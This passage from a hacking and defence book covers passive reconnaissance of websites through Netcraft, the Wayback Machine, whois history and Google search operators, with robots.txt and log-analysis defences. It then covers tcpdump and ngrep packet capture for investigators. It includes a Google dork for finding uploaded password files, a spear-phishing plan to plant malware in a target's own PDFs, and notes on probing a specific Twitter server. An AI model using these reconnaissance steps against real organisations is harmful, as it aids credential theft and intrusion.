Domain: twitter.com                   Netblock: NTT America, Inc. 
IP address: 128.121.146.100           Site rank: 5314 
Country: US                           Nameserver: ns1.p26.dynect.net 
Date first seen: June 1999            DNS admin: zone-admin@dyndns.com 
Domain Registry: godaddy.com          Reverse DNS: unknown 
Organisation: Twitter, Inc.           Nameserver Organisation: unknown 

Netcraft is another third-party website that a hacker can use to get up-to-date web statistics of a 
site. As you can see from this screenshot, it will give you the site address, the domain, who owns 
the network block of IP addresses, and who registered the domain. 

If the hacker clicks on the last reboot time, we can see that this website consistently stores 
information about the site, such as what OS is being run, what type of server is being run (such 
as Apache), the date that it was changed, and the IP address of the server. As we can see from this 
example, in all these instances Twitter was successful in limiting the recon on OS fingerprinting 
to one address, which shows Linux. However, as most hackers and administrators know, if they 
are running the Apache web server they are probably running some form of Linux. Therefore, we may 
want to further investigate 168.143.161.20 since it may not be as well secured as all the others. 


OS, Web Server and Hosting History for www.twitter.com 

http://www.twitter.com was running Apache on unknown when last queried at 17-Oct-2009 15:51:29 GMT 

OS       Server  Last changed  IP address       Netblock Owner 
unknown  Apache  14-Oct-2009   168.143.162.100  NTT America, Inc. 
unknown  Apache  13-Oct-2009   128.121.146.100  NTT America, Inc. 
unknown  Apache  12-Oct-2009   168.143.162.36   NTT America, Inc. 
unknown  Apache  11-Oct-2009   168.143.162.68   NTT America, Inc. 
Linux    Apache  10-Oct-2009   168.143.161.20   NTT America, Inc. 
unknown  Apache  9-Oct-2009    168.143.162.100  NTT America, Inc. 
unknown  Apache  8-Oct-2009    128.121.146.100  NTT America, Inc. 
unknown  Apache  7-Oct-2009    128.121.146.228  NTT America, Inc. 
unknown  Apache  6-Oct-2009    168.143.162.100  NTT America, Inc. 
unknown  Apache  6-Oct-2009    168.143.162.100  NTT America, Inc. 


Additionally, in this example the hacker can then go and look at another web server as part of 
this domain. And, in the example below, we can see specifically what version of Linux is being run 
and the specific version of Apache. 


[Screenshot: Netcraft site report for status.twitter.com (http://toolbar.netcraft.com/site_report?url=http://status.twitter.com), Hosting History. Netblock owner for every row: Michael Glenn, 419 Park Avenue South, Room 807, New York NY US 10016.] 

OS             Web Server    Last changed  IP address 
Linux Red Hat  Apache/2.2.3  1-Jul-2010    72.32.231.8 
Linux CentOS   Apache/2.2.3  30-Jun-2010   72.32.231.8 
Linux Red Hat  Apache/2.2.3  25-Jun-2010   72.32.231.8 
Linux CentOS   Apache/2.2.3  24-Jun-2010   72.32.231.8 
Linux Red Hat  Apache/2.2.3  22-Jun-2010   72.32.231.8 
Linux CentOS   Apache/2.2.3  21-Jun-2010   72.32.231.8 
Linux Red Hat  Apache/2.2.3  19-Jun-2010   72.32.231.8 
Linux CentOS   Apache/2.2.3  17-Jun-2010   72.32.231.8 
Linux Red Hat  Apache/2.2.3  3-Jun-2010    72.32.231.8 
Linux CentOS   Apache/2.2.3  2-Jun-2010    72.32.231.8 

Here we can see there is a Linux server running Red Hat Linux using Apache/2.2.3. As of the 
time of this writing, Apache is running at 2.2.15. The hacker then could use this information to 
do more direct research and vulnerability scanning, as discussed in the next chapter. 
Wayback Machine: Archive.org 


Archive.org maintains the Wayback Machine, which periodically creates snapshots of websites 
for review, basically allowing you to view web pages that are no longer hosted on the website. 
According to the website, the Wayback Machine maintains 56 billion website captures dating as 
far back as 1996. This is important to hackers because they can use it for their research, espe- 
cially when companies have realized that they might have had compromising information on their 
website and have taken it down. Using the Wayback Machine, the hacker can extend his 
research to any period of time, which will give him clues to additional avenues of attack that may 
be available to him. 


[Screenshot: Internet Archive Wayback Machine (http://web.archive.org/web/*/http://www.yahoo.com), 
"Searched for http://www.yahoo.com, 7439 Results", search results for Jan 01, 1996 - Apr 21, 2009 
grouped by year (1996: 12 pages, 1997: 27 pages, 1998: 26 pages, 1999: 36 pages, 2000: 219 pages, 
2001: 2963 pages, 2002: 244 pages, 2003: 134 pages, 2004: 413 pages), with the notes "Note some 
duplicates are not shown", "* denotes when site was updated", and "Material typically becomes 
available here 6 months after collection".]


As you can see in this example, this page contains thousands of snapshots of www.yahoo.com 
ranging from January 1996 to the present. 


[Screenshot: archived copy of www.yahoo.com, Wayback Machine snapshot 19990117061135 (January 17, 
1999), showing the Yahoo! directory categories such as News and Media, Business and Economy, 
Computers and Internet, Recreation and Sports, and Reference.]
How to Defend against This 


One of the ways to prevent automatic crawlers from crawling your website is to provide a robots.txt 
file in the root of your web server. Web administrators set up robots.txt files to prevent legitimate 
crawlers from crawling certain directories of their websites. Just because there is a robots.txt file 
doesn't mean crawlers can't crawl and archive the content, but this does work for archive.org. 


1. Create a file called robots.txt. 
2. Inside, create these two lines: 
   User-agent: * 
   Disallow: / 
3. Place this file in the root folder of your website. 


As you can see from these two entries, the “*” means that this applies to all bots, and the “/” means 
the entire site. For more information on this please see http://support.microsoft.com/kb/217103 
and http://www.robotstxt.org/robotstxt.html. 
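Before deploying a robots.txt it is worth checking what it actually permits, because the two-line file above also keeps Google and every other legitimate search engine out of the whole site, and because every path a robots.txt names is published to anyone who reads it. The following added example (not code from the book) uses Python's standard urllib.robotparser, which implements the original robots.txt rules the robotstxt.org page describes, to audit two policies: the catch-all file from the steps above, and a more selective one that singles out ia_archiver, the user-agent name archive.org's crawler has used (archive.org honored such exclusions when this text was written; it has since stopped doing so for many sites). The host name, the agent names other than ia_archiver, and the paths are made up for the example.

```python
"""Audit what a robots.txt permits, using Python's standard urllib.robotparser.

Added example, not part of the book.  Host, paths and the agent names other
than ia_archiver are placeholders.
"""
from urllib.robotparser import RobotFileParser

# The two-line file from the steps above: every crawler, the whole site.
BLOCK_ALL = """\
User-agent: *
Disallow: /
"""

# Alternative policy: keep archive.org's crawler (ia_archiver) out entirely,
# keep everyone else out of the admin and upload areas, leave the rest crawlable.
# Remember that these paths are readable by anyone who fetches robots.txt.
SELECTIVE = """\
User-agent: ia_archiver
Disallow: /

User-agent: *
Disallow: /admin/
Disallow: /uploads/
"""

SITE = "http://www.example.com"   # placeholder host for the example


def load(robots_text: str) -> RobotFileParser:
    """Parse robots.txt text (as the file's lines) into a RobotFileParser."""
    rp = RobotFileParser()
    rp.parse(robots_text.splitlines())
    return rp


def can_fetch(robots_text: str, user_agent: str, path: str) -> bool:
    """True if the policy lets `user_agent` fetch `path` on SITE."""
    return load(robots_text).can_fetch(user_agent, SITE + path)


def audit(robots_text: str, user_agents, paths):
    """Map (agent, path) -> allowed?, so a whole policy can be reviewed at once."""
    rp = load(robots_text)
    return {(ua, p): rp.can_fetch(ua, SITE + p) for ua in user_agents for p in paths}


if __name__ == "__main__":
    agents = ["ia_archiver", "Googlebot", "Mozilla/5.0"]
    paths = ["/", "/index.html", "/admin/users", "/uploads/report.pdf"]
    for name, text in (("block-all", BLOCK_ALL), ("selective", SELECTIVE)):
        print(name)
        for (ua, p), ok in audit(text, agents, paths).items():
            print(f"  {ua:12} {p:22} {'allow' if ok else 'DENY'}")
```

Running it shows the block-all policy denying every agent every path, while the selective policy denies ia_archiver everything and denies the other agents only the two listed directories. A crawler that ignores robots.txt is unaffected by either file; the log-analysis section later in this chapter is how you find out whether that is happening.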


Whois History: DomainTools.org 


DomainTools.org also provides domain search, ping, traceroute, reverse IP, and domain history 
tools. One of the unique things about this website is that it provides an extensive database of 
whois history throughout time. So if a domain changes ownership, there are records of the 
previous owners and the information that we have leveraged previously. As you can see in this 
image they have 2785 previous whois records for Yahoo.com. Additionally, this site has 
monitoring capabilities that could allow a hacker to monitor other name servers to keep track 
of additional domains the target uses. 


[Screenshot: DomainTools "View Historical Whois Records" for yahoo.com 
(http://domain-history.domaintools.com/?q=yahoo.com): "We have 2785 historical whois records for 
Yahoo.com. Here is a complete list of dates that we have whois records for.", followed by a grid of 
record dates from 2001-10-05 through 2010, and "Upgrade your membership to view the historical 
whois records!"]
Zone-h.org 


Zone-h is an archive of website defacements. Many times, when hackers have defaced a website or 
organization, they will go and submit it anonymously to Zone-h. Using Zone-h, they can see if other 
hackers were able to exploit any other vulnerabilities of a certain site, and what types of vulner- 
abilities are available to exploit. Also, Zone-h lists operating system and version information for 
further direct recon in order to exploit. 


[Screenshot: Zone-H.org home page (http://zone-h.com/) with a news item dated 10/09/2009 
reporting that the FBI job site (fbijobs.gov) had been defaced through a SQL injection flaw, site 
statistics ("Digital Attacks: 3451342", "Attacks On Hold: 1944"), an editorial on defacement as 
hacktivism, and a "latest defacements" list.]


Indirect Web Browsing and Crawling 


One of the best ways to do indirect research against a target is to examine the website itself through 
a search engine. The website can contain many clues for the attacker to aid in his research and 
his attack. Using the website and search engines, the hacker can search through everything on the 
domain. As with the whois method, the hacker can find usernames, email addresses, accounts, 
passwords, technical information, and much more. It all depends on his ability to craft certain 
queries. Hackers can use structured queries to identify specific page URLs, document titles, host 
names, links, and even files such as PDFs and documents. 

Also, we can use the information on the website to infer certain things. For instance, we can 
look at an enterprise's job postings for the information technology department; the technical 
skills they require may indicate what technologies they are using. For instance, the postings could 
include a job ID for a SharePoint Administrator or an Apache Administrator, with 
specific OS version information. The easiest way to search for information about a website is to use a 
search engine against it; this is indirect research, as the search provider will be performing all of the 
queries. This helps prevent the attacker from being caught and leaving behind artifacts. 


Indirect Research: Google.com 


One of the best search engines out there is Google, which gives the hacker much flexibility when 
performing searches. The hacker can combine many different commands as part of the Google 
search engine to give him back the specific information he is looking for. However, the hacker 
needs to know the various switches available to him to exclude and include terms. 


Google Search Commands 


Search term    Example              Description 

site:          site:*.gov           Allows you to search entire domains. 
- (exclude)    -facebook            Allows you to exclude certain terms from your results. 
+ (require)    +google              Requires certain terms in your results. 
link:          link:zone-h.org      Allows you to search for pages that link to another website. 
inurl:         inurl:documents      Allows you to search the URL for terms. 
intitle:       intitle:"hacking"    Allows you to search the page title for specific terms. 
file type      *.jpg                One of the most important: allows you to search for files of 
                                    a certain type within a certain domain. 


Using all of these queries together, we can craft some very specific queries to gather research 
against our target. For instance, using “intitle:index.of.config site:*.com” can grab the hacker 
the complete index of the website in order to further his research. Another example is password 
"*.txt" inurl:.txt intitle:download site:upload.ee. This would look for all password files in .txt 
format that users uploaded to this website. 

So say, for instance, a hacker wants to send a spear phish with a legitimate PDF attached to an 
individual within the organization. The hacker could perform an @domain.com search in order to get a 
list of email addresses using ARIN. He could then craft a Google query to search for all the PDFs 
located on the web server. For example: *.pdf site:domaintobehacked.com 

Using this information, the hacker would then have a list of email addresses and legitimate 
PDFs that he can add malware to and send to individuals on the network in order to compro- 
mise them. Google can recognize these techniques and block them. 
[Screenshot: Google "We're sorry..." page: "...but your computer or network may be sending automated 
queries. To protect our users, we can't process your request right now. See Google Help for more 
information."]


How to Defend against This 


The only real way to defend against this is to make sure that compromising information exposed 
externally on the Web is kept to a minimum. Also, make sure that all Web management systems are 
turned off and not accessible from outside the network. 


Indirect Recon: Cache, Google.com 


Google also has the ability to look at old web pages via the cache that they store. This is a very 
good tool when hackers want to learn about web pages that have been taken down or are no longer 
available to leverage information against them. For example, as you can see in each of the search 
queries you have an option called “Cached.” 


Woot : What Is Woot? 

Woot is the originator of One Day, One Deal. Every midnight (central) we launch an event: 
one sale that lives until it sells out, or the next midnight. ... 
www.woot.com/whatiswoot.aspx - Cached - Similar 


The next example shows you the date and time of the page as it appeared on July 1, 2010. 
However, what hackers fail to realize is that this isn't completely passive, meaning this isn't all 
exactly in Google's cache; therefore this is not an indirect method, as the hacker is creating arti- 
facts on his possible target. The only thing stored in Google's cache is text; the images are being 
pulled directly from the website itself. 


[Screenshot: Google cache of www.woot.com/whatiswoot.aspx, full version, with the cache banner 
("... could have changed in the meantime. Learn more"; "These search terms are highlighted: woot com"; 
"Text-only version" link) above the rendered Woot page, whose images are loaded from woot.com itself.]
Therefore, if you click on text-only version, Google adds the words “&strip=1” to the web URL 
and strips out all the graphics, and this provides a more secure way of viewing the cached content 
on the website rather than connecting back to the possible target directly. 


[Screenshot: the text-only version of the same cached page (URL ending in &strip=1): "This is Google's 
cache of http://www.woot.com/whatiswoot.aspx. It is a snapshot of the page as it appeared on Jul 1, 
2010 21:53:16 GMT. The current page could have changed in the meantime. Learn more", "These search 
terms are highlighted: woot com", "Full version" link, followed by the page text without images 
("Woot is the originator of One Day, One Deal. Every midnight (central) we launch an event: one 
sale that lives until it sells out, or the next midnight.").]
Indirect Research: Google Hacking Database 


Johnny Long, a well-known hacker, maintains a database filled with unique Google search queries 
that give back valuable information. There are very easy ways to do fingerprinting, such as find- 
ing known versions, password lists, or even administration back ends to some servers or network 
devices. For more information on unique Google queries check out http://www.hackersforcharity.org/ghdb/. 


[Screenshot: the Google Hacking Database (GHDB) at hackersforcharity.org/ghdb/]


Indirect Research: lmgtfy.com 


LMGTFY stands for “Let Me Google That For You.” So now if your coworkers see you reading 
this book on computer hacking, and ask you questions about it, you can just point them to the 
link from this website. Go to the site, enter their question, and give them the link back. Then you 
can get a kick out of their reaction. 
[Screenshot: lmgtfy.com ("Let me google that for you") with the query "what is 127.0.0.1" 
(http://lmgtfy.com/?q=what+is+127.0.0.1), animating the Google search and ending with 
"Was that so hard?"]

Indirect Research: Duckduckgo.com 


This is a good website just to get quick relevant information back on a subject, for instance, if you 
don't know a term or don't know what a specific thing is. 

It's almost impossible to defend against crafted third-party web queries. However, you may be 
able to monitor when websites like the ones described above are querying and how they are doing 
it. You would have to perform some log analysis in order to do that. Logs are located in Apache at 
/var/log/http. In Linux use your favorite text editor to open up this file. 


The logs in Windows are located in Windows\System32\Logfiles, and these files can 
be opened with WordPad or Notepad. 
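The log analysis the two paragraphs above call for can be done with a short script. The following added example (not code from the book) parses Apache "combined" format access-log lines, tags requests coming from the research and archiving crawlers discussed in this chapter by their User-Agent, and reports per crawler how many hits came from which addresses, which paths were fetched, and whether the crawler asked for /robots.txt before fetching content. The log lines are constructed for the example, the IP addresses are documentation ranges, and the Netcraft and Googlebot marker strings are assumptions about how those crawlers announce themselves (ia_archiver is the name archive.org's crawler has used). Note that the exact Apache log location depends on the distribution, commonly /var/log/httpd/access_log on Red Hat derivatives and /var/log/apache2/access.log on Debian derivatives; the IIS logs under Windows\System32\LogFiles use the W3C format, not this one.

```python
"""Spot research/archiving crawlers in an Apache "combined" access log.

Added example, not part of the book.  SAMPLE_LOG is constructed; the crawler
marker strings other than ia_archiver are assumptions.
"""
import re
from collections import defaultdict

# One "combined" format line: ip ident user [time] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Lower-cased substring of the User-Agent -> label used in the report.
CRAWLER_MARKERS = {
    "ia_archiver": "archive.org",   # Wayback Machine's crawler
    "netcraft": "Netcraft",         # assumed marker
    "googlebot": "Google",          # assumed marker
}

# Constructed sample: two archive.org hits (robots.txt first), one Netcraft hit,
# one ordinary browser visit, one Googlebot hit that never read robots.txt.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jul/2010:03:12:01 +0000] "GET /robots.txt HTTP/1.1" 200 26 "-" "ia_archiver"
203.0.113.7 - - [10/Jul/2010:03:12:02 +0000] "GET /whatiswoot.aspx HTTP/1.1" 200 5120 "-" "ia_archiver"
198.51.100.4 - - [10/Jul/2010:04:00:10 +0000] "GET / HTTP/1.1" 200 812 "-" "Mozilla/4.0 (compatible; Netcraft Web Server Survey)"
192.0.2.99 - - [10/Jul/2010:05:30:44 +0000] "GET /index.html HTTP/1.1" 200 9000 "http://www.google.com/" "Mozilla/5.0 (Windows NT 6.1) Firefox/3.6"
192.0.2.12 - - [10/Jul/2010:06:01:00 +0000] "GET /docs/handbook.pdf HTTP/1.1" 200 44000 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
"""


def parse_line(line: str):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(user_agent: str):
    """Label the crawler behind a User-Agent, or None for a browser / unknown agent."""
    ua = user_agent.lower()
    for marker, label in CRAWLER_MARKERS.items():
        if marker in ua:
            return label
    return None


def crawler_report(lines):
    """Aggregate per crawler: hit count, source IPs, paths, and whether /robots.txt was read."""
    report = defaultdict(lambda: {"hits": 0, "ips": set(), "paths": set(), "read_robots": False})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue              # unparseable line: skip rather than guess
        label = classify(rec["ua"])
        if label is None:
            continue
        entry = report[label]
        entry["hits"] += 1
        entry["ips"].add(rec["ip"])
        entry["paths"].add(rec["path"])
        if rec["path"] == "/robots.txt":
            entry["read_robots"] = True
    return dict(report)


def ignored_robots(report):
    """Crawlers that fetched content in this log window without ever asking for /robots.txt."""
    return sorted(name for name, e in report.items()
                  if not e["read_robots"] and e["paths"] - {"/robots.txt"})


if __name__ == "__main__":
    rep = crawler_report(SAMPLE_LOG.splitlines())
    for name, e in sorted(rep.items()):
        print(f"{name:12} hits={e['hits']} ips={sorted(e['ips'])} "
              f"robots.txt={'yes' if e['read_robots'] else 'no'}")
    print("never read robots.txt:", ignored_robots(rep))
```

Point the script at a real access log (read the file and pass its lines to crawler_report) to see which of these services is visiting and how often; a crawler that keeps fetching content while never requesting /robots.txt is one your robots.txt cannot influence, and the only remaining controls are what you publish and the block lists on your web server or firewall.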


Summary 


From this chapter, remember it's all about how hackers go about researching the targets they wish 
to attack. Hackers are targeting something specific, and need to find many different avenues and 
routes to get to that specific target in order to attack it and gather as much information as they can. 
If they are able to obtain the research that they need discreetly, then they will be highly successful 
in their attack and in finding specific vulnerabilities to exploit. The important part of this chapter 
is performing indirect research on possible targets. Exhausting indirect methods allows the hacker 
to decrease his likelihood of getting caught by avoiding leaving digital footprints across the network. 
Thus, once he has the information and leads, he can perform the direct research he needs in order 
to start attacking the target. 


Chapter 8 


Capturing Network Traffic 


Overview 


In this chapter we go over the process of capturing network traffic. There are two perspectives to 
think about in regards to network traffic. First, why the hacker is collecting traffic, and second, 
why the network defender collects network traffic. For the most part, the hacker is only interested 
in network traffic to either identify new vectors of attack or to steal confidential information or 
personally identifiable information. Collecting traffic from the network defender's point of view is 
a primary asset in identifying, thwarting, and defending against network attacks. 

Therefore, it is assumed that by the time the hacker has the ability to actually collect network traf- 
fic across the wire, he has already penetrated the system. This is because in order to sniff the net- 
work via a network interface card he has to have some type of access to the target. Generally, in more 
secure enterprise networks wireless vectors aren't an option, and if there are wireless networks they 
may require some heavy-duty security/authentication involving multifactor authentication, 
RADIUS access, and public key encryption rather than just cracking an access point using Wired 
Equivalent Privacy (WEP) or Wi-Fi Protected Access (WPA) encryption. 

Therefore, in most intrusions network packet interception probably wouldn’t occur until a 
server has been exploited. As a consequence, the hacker is likely targeting the traffic to further 
move laterally through the network by identifying new Internet protocol (IP) addresses or to inter- 
cept authentication credentials of some sort. If the hacker has targeted and exploited a server then 
odds are that he can run a sniffer program on the machine. Clients typically have the ability to 
post to the server; if that is the case it’s possible to sniff the credentials they use to access the server. 
However, if the victim isn’t used as a server, then sniffing the network would be a much 
less favorable option. The hacker sniffing the network has access to all protocol information cross- 
ing the wire, as well as files and authentication attempts for that server. 

A network defender, on the other hand, collects network traffic across the wire in order to 
identify intrusions into the network, and to solve the who, what, why, and how of an attack that 
has occurred. Therefore, network traffic is invaluable to network investigators/defenders, and the 
smartest defenders will have network sniffers up at multiple points in their network. Therefore, 
this chapter is focused solely on the network defender’s point of view, as sniffing is a highly unlikely 
intrusion method for experienced hackers. 
Network Placement 


In Figure 8.1, we go back to Pwn3d Corporation to look at areas where sniffing will be present. 
Generally, you will see sniffers connected to the external Internet router and internal router, which 
will grab a majority of the traffic. Additionally, many times critical infrastructure segments such 
as defense projects would be monitored. Once an intrusion is possibly detected, network defenders 
will move to place new sniffers in more strategic places to respond to the attack proactively, trying 
to understand the scope of the intrusion and any lateral movement occurring. If the hacker moves 
laterally and increases the scope of the investigation then network defenders will move accordingly 
to isolate and record traffic to understand the severity of the attack. 


Collision Domains 


Network packet sniffers can monitor packets going across the wire; however, they will only be able 
to sniff the entirety of the network if the ports they are using are in the same collision domain. In 
the old days, if you plugged into a hub and started sniffing the network you could grab as many 
packets as you wanted because a hub is a Layer 1 device that forwards all packets out over every 
interface (or port). However, then switches came along, which are much smarter devices that do 
frame switching at Layer 2 of the network, and some switches now even have functionality all 
the way up to Layer 3 of the OSI model. Some higher-end switches will do limited routing on IP 
packets, which normally is reserved for a router. In a switch, though, every port/interface is consid- 
ered its own collision domain and will not forward packets across all interfaces unless it is a broad- 
cast packet or is set up for some type of network monitoring. Therefore, the hacker sniffing the 
network is once again not as valuable as it used to be—he can’t access many of the packets on the 
network because they are not in the same collision domain. The only way for a hacker to change 
that is to hack the switch, discover the port he is plugged into, and change it to a switched port 
analyzer (SPAN) port. The hacker would be more likely to sniff if he were on a critical server. The 
amount of traffic generated and lag associated with the network would likely not be worth the 
effort due to detection of tools being transferred, and risking losing control of the server due to a 
very limited Internet connection or messing up the internal network configurations. 


Figure 8.1 Sample network placement diagram. 


Intrusion Detection at the Packet Level 


Generally, when an intrusion is detected, it’s because an individual is alerted by their system act- 
ing unusual or a network monitoring analysis team of some sort is alerted by unusual activity. 
Network monitoring teams are sniffing the network as shown previously at critical areas, network 
perimeters, and most importantly ingress and egress of the network itself. Normally, by sniffing, 
they are either deploying a sniffer that is gathering the entirety of network traffic being sent over 
the network or they have an intrusion detection system in place that is at least detecting anoma- 
lies in the traffic. Monitoring teams have normally three options when monitoring the network: 
capture the entirety of the packets going across the network, capture the first 96 bytes of the 
packet headers in order to do net flow analysis, or monitor the traffic coming across the network 
for anomalies. 


1. Capturing entire packets: Allows for full network analysis, and reconstruction of sessions, 
file transfers, and so on, and is the most complex to analyze and a time-consuming option; 
however, it is the most thorough. 

2. Capturing packet headers: This option is what is used for netflow analysis, looking for 
abnormal activity to ports, protocols, and known bad IP addresses that are blacklisted or 
threats in general. Also, it looks for abnormal date/time discrepancies, for instance a server 
is beaconing at 3 am every 2 weeks to a certain IP address. This is a good option for detect- 
ing network anomalies, however it can be slow to analyze and is typically used over a period 
of time. However, investigators do not have any ability to actually examine the contents of 
packets. 

3. Capturing for intrusion detection: This option allows for intrusions to be detected in real 
time on a network; however, packet captures aren't typically recorded. Generally, this is 
one way intrusions can be easily detected and responded to. Network defenders will set up 
intrusion detection systems (IDSs) in key areas, which check against signature databases for 
intrusion-related events and trends for malicious activity. If an event were to occur, network 
defenders have the option to start turning on full capture monitoring on key segments that 
may have been intruded upon. 


Monitoring Limitations 


Caution: Network monitoring is a processor-intensive activity and can seriously degrade the 
network performance of a switch or router. Make sure when monitoring that the device is capable 
of handling the load without seriously degrading the performance of the network. Generally, if the 
device is processing too much traffic, you will start seeing dropped or malformed packets in your 
captures, and increased response times of hosts may be present. In theory, there have been discus- 
sions of the attacker being able to detect monitoring by the performance of the network, or by the 
response to certain packets he sends over the network. Therefore, it is 
possible for a hacker to detect a network sniffer running in promiscuous mode. 
Network Response Methodology 


■ Monitor: Many initial intrusions can be detected by monitoring network data of some sort, 
whether that be by full packet capture, netflow data, or IDSs monitoring the network (see 
Figure 8.2). 

■ Detection: Once the data is collected, it needs to be interpreted and detected upon using 
intrusion detection systems such as Snort. Note that network defenders have the ability to 
run network captures through Snort after the fact. 

■ Analysis: Once the data has been collected and detected, analysis occurs. Network defenders 
are likely going to monitor and analyze the network traffic on which an intrusion detection 
system (IDS) alert has occurred. 

■ Response: Once analysis has occurred via examining the network traffic, then it's possible 
that these systems need to be forensically analyzed; therefore, investigators are going to per- 
form an incident response and do forensic analysis on the affected system while additionally 
trying to analyze the scope of the intrusion. 


Monitoring/Capturing 


One of the most popular programs to sniff traffic on the network is tcpdump, where TCP stands 
for Transmission Control Protocol. The tool tcpdump is a Linux command line program that uses 
libpcap, a library to capture packets. Investigators use this program to capture network traffic eas- 
ily and efficiently and also use this program to filter data down to better investigate. Hackers also 
use this program to dump data off the network and steal information off of it. The files tcpdump 
creates are binary capture files, meaning they are full binary packets and require a program to be 
interpreted. A sample command is sudo tcpdump -s0 -nntttt -C 100M -w capture.cap. 


Figure 8.2 Network response methodology. 
Command line switches for tcpdump include 


■ -s: Snapshot length. This tells tcpdump how many bytes of each packet to capture. Older 
versions of tcpdump (including the one in the sample output below) default to a snap length 
of 96 bytes, which covers only the headers and none of the application data; current versions 
default to 262144 bytes. Either way, specify -s0 when sniffing so the full packet is always 
captured. 

■ -r: Reads packets from a capture file instead of an interface. Combine it with a Berkeley 
Packet Filter expression, for example to keep only packets belonging to a certain IP address. 

■ -w: Writes the packets, whether sniffed from the network or read from a file with a filter, 
to a new capture file instead of printing them. 

■ -nn: Prevents the conversion of host addresses and port numbers to names. This is important 
in an investigation: reverse domain name system (DNS) lookups could be noticed by an attacker 
who controls the name servers for his addresses, and investigators should work from the raw 
IP addresses and port numbers rather than from service names. 

■ -tttt: Prints the timestamp on each dump line as a full date and time. This is important to 
an investigator trying to establish where and roughly when an intrusion may have happened. 

■ -C: Sets the maximum size of each capture file, in millions of bytes. Once the current file 
exceeds that size, tcpdump closes it and starts a new one. This is useful when analyzing with 
graphical user interface (GUI) tools such as Wireshark, as it lets you open smaller captures; 
otherwise a long capture may be too large to open. 

■ -X: Prints each packet's contents in hex and ASCII on screen; the output can also be 
redirected to a text file for searching. 


Here is a sample of the tcpdump command in action: 

hacker@ubuntu:~$ sudo tcpdump 
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode 
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes 


Note: The default snapshot length on this version is 96 bytes! A good way to determine the 
snapshot length used for an existing packet capture is to run the file command on it, which 
reports the link type and capture length stored in the pcap header. 


Viewing Text Data 


Sometimes it is useful to print packet contents to the screen, or to a text file, to quickly see 
what is inside a packet capture or what types of packets are being gathered across the network. 
The -X option does this within tcpdump; alternatively, hexdump -C shows the raw bytes of a 
capture file itself. A sample command is: 


sudo tcpdump -s0 -nntttt -X | tee capture.txt 


The tee command writes the output to capture.txt while still showing it on screen. Another 
sample command is hexdump -C capture.cap, which prints the hex and ASCII contents of the 
capture file (including the pcap file and record headers, not just the packet data). This can be 
good for searching and filtering through the capture for pertinent information. 


Searching Text and Binary 


Once you have captured binary or text files, you have to be able to search through them for 
relevant information. Many times network investigators have collected gigabytes and gigabytes 
of capture traffic. Searching binary capture files with text tools is slow and unreliable, so it 
is often most convenient to convert them to a text file first. To convert to a text file: 


■ tcpdump -nntttt -r capture.cap > capture.txt <- Converts only the headers, for searching addresses and ports 
■ tcpdump -nntttt -X -r capture.cap > capture.txt <- Converts the hex/ASCII packet contents as well 


You have to make sure that you convert with -X in order to be able to search the application 
layer of the packets. Otherwise, you can only do IP header and net flow style analysis, which 
lets you search for IP address and port combinations but not for content. To view a portion of 
capture.txt use head -n 10 capture.txt, which prints the first 10 lines. This lets you check 
that the conversion went right and that the capture file is good. 

To perform a text-based search on text files, you can use gawk or grep on Linux: 


■ gawk '/searchterm/' capture.txt 
■ grep "searchterm" capture.txt 


Investigators can perform text-based searches on converted captures to look for known bad 
terms such as malware strings, IP addresses, or even file names. Keep in mind that -X prints 
16 bytes per line with the ASCII on the right, so a string that crosses a line boundary will not 
match a simple grep; tcpdump -A prints the payload as plain ASCII and is better suited to 
string searches. 
To search binary capture files directly, use ngrep: 


ngrep -I hacker.cap -O PE.cap -q -X 50450000 

-I: Reads input from a pcap file instead of sniffing an interface. 

-O: Writes every packet matching the expression to a new capture file. 

-X: Treats the match expression as a hexadecimal string rather than text. 

-q: Quiet; suppresses the '#' marks printed for nonmatching packets, which also makes ngrep faster. 

-i: Ignores case in a text expression (not needed with -X, but useful for string searches). 


This command reads the capture file, looks in every packet for the hexadecimal signature of a 
portable executable (PE) header, 50 45 00 00 ("PE\0\0"), and writes each matching packet to 
PE.cap. This is very useful for going through entire packet captures that have not yet been 
filtered; you can then open those packets in a tool such as Wireshark and start analyzing how 
an intrusion may have occurred. Two caveats: ngrep matches within single packets, so a 
signature that straddles two TCP segments will be missed, and the four bytes PE\0\0 can occur 
in data that is not an executable, so treat a hit as a lead rather than proof. 


Filtering 


Generally, when searching for data inside a capture file, network investigators pare the data 
down to a smaller capture file by filtering. They identify an IP address that was determined 
to be malicious and then filter down to the communications between the affected host and other 
hosts. This lets investigators pinpoint other systems the hacker has compromised and determine 
how the victim was compromised in the first place. It also makes it much easier to run string 
searches and Snort detection, and lets you open some of the traffic in Wireshark. tcpdump 
accepts Berkeley Packet Filter syntax to pare down the data, so you can select source and 
destination hosts, protocols, or ports. A sample command is 

tcpdump -nntttt -s0 -r old.cap -w new.cap host 10.1.1.1 and port 80 

host <- Matches a specific host, as source or destination. 
port <- Matches a specific port, as source or destination. 
net <- Matches an entire network, for example net 10.1.1.0/24. 
tcp/udp/icmp <- Matches the protocol being used. 


BPF also provides the logical operators and, or, and not (the keywords are lowercase; &&, || 
and ! are accepted as well) so you can combine primitives for more detailed filtering. Note: 
The same pare-down can be done in Wireshark. 

Once you have captured your data and filtered it down, next comes finding the 
intrusion-related artifacts within the packet capture. 


Windows Executable and Signatures 


Windows binary executables contain what is called a PE header, so malicious executables 
being transferred over the network to compromise a system will contain this signature. 
Searching or detecting on this signature is a good way to spot executables going over the 
network, especially when combined with other rules. 


Common File Signatures of Malware 


File signatures (magic bytes) of the formats malware is commonly delivered in: 

MZ = 4D 5A <- Windows executable: EXE, DLL, COM, DRV, and other PE files 
PE = 50 45 00 00 <- Portable Executable header, located at the file offset stored at 0x3C 
PK = 50 4B 03 04 <- ZIP file 
%PDF = 25 50 44 46 <- PDF file 


MZ is actually the DOS header of a portable executable, followed by a small DOS stub program. 
Typically, shortly after the MZ header you will find the string "This program cannot be run in 
DOS mode", which is found in almost every Windows executable. This is also a good string to 
search for in order to detect an executable. 


